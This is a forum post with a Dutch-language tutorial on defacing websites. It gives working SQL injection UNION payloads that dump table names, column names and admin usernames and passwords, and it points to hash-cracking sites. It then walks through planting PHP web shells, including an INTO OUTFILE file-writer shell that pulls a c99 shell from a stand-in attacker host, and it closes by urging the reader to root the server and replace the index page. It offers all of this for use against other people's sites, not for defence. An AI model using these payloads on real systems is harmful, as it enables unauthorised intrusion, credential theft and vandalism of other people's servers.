G-ride
Electrik Buzzz
Inregistrat: acum 17 ani
Postari: 35
|
|
................
Code:
script.php?id=-1 union all select 1,2,3,4,5,group_concat(table_name) from information_schema.tables where table_schema=database()--
script.php?id=-1 union all select 1,2,3,4,5,group_concat(column_name) from information_schema.columns where table_schema=database()-- |
Oke , er is waarschijnlijk een tabel genaamd admin_users, en 2 kolommen genaamd admin_name & admin_pass .
Laten we de informatie uit die tabellen en kolommen halen.
Code:
script.php?id=-1 union all select 1,2,3,4,5,group_concat(admin_name,0x3a,admin_pass),7,8,9,10 from admin_users--
Als het een hash is (32 karakters) , gebruik http://www.gdataonline.com, http://www.tmto.org/search/ of http://www.milw0rm.com/cracker om de hash te cracken. |
2. Login in het admin paneel
3. Probeer iets te vinden, waar je de mogelijkheid hebt, om iets up te loaden, zoals een album of iets dergelijke. Want album/image mappen zijn vaak schrijfbaar!
4. Upload een shell.PHP (geen .txt, gebruik .txt als je RFI (Remote File Inclusion) gebruikt. Ga nu naar je geuploadde shell , site.com/c99.php , en als het mogelijk is, root it! (check voor wat beschikbare exploits milw0rm.com, altijd handig)
5. Verander de index.html/php/asp of dergelijke, als het schrijfbaar is, naar eigen keuze! 
Hoe defacen via SQL injection wanneer magic_quotes aan zijn en je het volledige pad weet van de server (bijv. /home/www/site.com/public_html): 1. Gebruik het geinfecteerde kolom nummer, bijvoorbeeld 7 :
Code:
site.com/script.php?id=-1 union all select 1,2,3,4,5,6,"<?php fwrite(fopen($_GET[o], 'w'), file_get_contents($_GET[i])); ?>",8,9,10 INTO OUTFILE '/home/www/site.com/public_html/images/shell.php'-- |
gebruik /images/ omdat deze bijna altijd schrijfbaar is. 2. Nu kan je parameters opgeven naar de shell.php , zoals:
Code:
http://www.site.com/images/shell.php?o=c99.php&i=http://www.EVILSITE.COM/shells/c99.txt |
Dit maakt een bestand c99.php aan , met de text van erin.
3. Raad eens !! Yes!!!! je kunt nu in je shell via  Ga dus nu naar je shell , site.com/images/c99.php , en als het mogelijk is, root it! (check voor wat beschikbare exploits milw0rm.com, altijd handig)
_______________________________________

|
|